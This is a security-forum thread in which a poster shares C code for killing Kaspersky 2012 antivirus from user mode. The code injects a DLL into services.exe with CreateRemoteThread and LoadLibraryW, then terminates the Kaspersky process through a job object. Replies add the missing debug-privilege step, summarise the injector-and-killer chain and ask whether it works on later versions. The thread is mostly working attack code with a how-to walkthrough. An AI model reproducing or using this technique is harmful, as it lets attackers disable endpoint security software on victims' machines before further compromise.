[kmd]

I don't think so, It would already be done otherwise.

what was the point then? if nothing is available

[Tigzy]

what was the point then? if nothing is available

To boast? :)

[R00tKit]

hi
conjunction to this post http://www.kernelmode.info/forum/viewto ... 85&start=0

i will show you how can kill kaspersky 2012 from user mode

its simple and stupid :
kaspersky allow injecting code inside services.exe and also it allow services.exe open handle with full Access
so what ? :lol: its developer forget hooking AssignProcessToJobObject :o :o

i inject this code into services.exe :( without any optimal )

Code: Select all

void Killkaspersky(int pid)
{
	OutputDebugString(L"inside kill\r\n");
	WCHAR f[100];
	HANDLE han=OpenProcess(PROCESS_ALL_ACCESS,NULL,pid);
	
	if (han==INVALID_HANDLE_VALUE)
	{
	OutputDebugString(L"error open");
	return ;
	}
		HANDLE jo=CreateJobObjectW(NULL,L"job");

		if(!DebugActiveProcess(1732))
		{
		 OutputDebugString(L"error debug");	return;
		}
		//else exit(0);
		if(AssignProcessToJobObject(jo,(HANDLE)han))
		{
			OutputDebugString(L"yes AssignProcessToJobObject");
			if(TerminateJobObject(jo,0))
			{
				OutputDebugString(L"yes TerminateJobObject");
			}
			else 
			{ 
				OutputDebugString(L"error TerminateJobObject");
			}	
		}
		else
		{ 
			wsprintf(f,L"Error %x\r\n",GetLastError());
			OutputDebugStringW(f);// %d",GetLastError());
		}

	
	
}

Code: Select all

BOOL InjectDll(DWORD dwPID, LPTSTR lptDll)
{
	HANDLE hProcess;
	size_t dwDllLen = 0;
	LPVOID lpMem;
	DWORD dwWriteByte;
	LPVOID lpFunc;
	HANDLE hThread;

	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID);
	if ( hProcess ){
		StringCchLength(lptDll, MAX_PATH, &dwDllLen);
		if ( dwDllLen ){
			dwDllLen = (dwDllLen + 1) * sizeof(TCHAR);
			lpMem = VirtualAllocEx(hProcess, NULL, dwDllLen, MEM_COMMIT, PAGE_READWRITE);
			if ( lpMem ){
				if ( WriteProcessMemory(hProcess, lpMem, lptDll, dwDllLen, &dwWriteByte) ){
					lpFunc = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryW");
					if ( dwWriteByte ){
						hThread = CreateRemoteThread(hProcess, FALSE, 0, (LPTHREAD_START_ROUTINE)lpFunc, lpMem, 0, NULL);
						if ( hThread )
						{
							WaitForSingleObject(hThread, INFINITE);
							CloseHandle(hThread);
							return TRUE;
						}
					}
				}
				VirtualFreeEx(hProcess, lpMem, 0, MEM_RELEASE);
			}
		}
		CloseHandle(hProcess);
	}

	return FALSE;
}

(more bug after my school exam :lol: )
have good time

[redp]

its developer forget hooking AssignProcessToJobObject :o :o

Mcafee (at least version 4.x) too (this is list of spliced functions, not SSDT hooks) :lol:

[iSecure]

NtCl0$e

On what systems you have tested your poc?

I get access denied when i try to OpenProcess() with PROCESS_ALL_ACCESS and PID of "services.exe" process (even on XP with admin priv).
How it suppose to inject to "services.exe" then? Please clarify this... Thanks

[EP_X0FF]

You forgot about SE_DEBUG_PRIVILEGE.

[iSecure]

You forgot about SE_DEBUG_PRIVILEGE.

Damn, you are right.

[Mut4nt]

nice, well , kaspersky has always been weak ... I remember the 8,9 versions, they were very easy to remove from user mode :?

[Tigzy]

So basically to sum up ?

"Injector.exe" -> injects services.exe with "killer.dll"
"killer.dll" -> Open full rights handle on kaspersky process (ui?) -> assign a dummy job to this process -> terminate the job (and consequently the process)

[R00tKit]

Kaspersky 2013 don't hook AssignProcessToJobObject again
I cant test it todays
can my code kill new version ?
thanks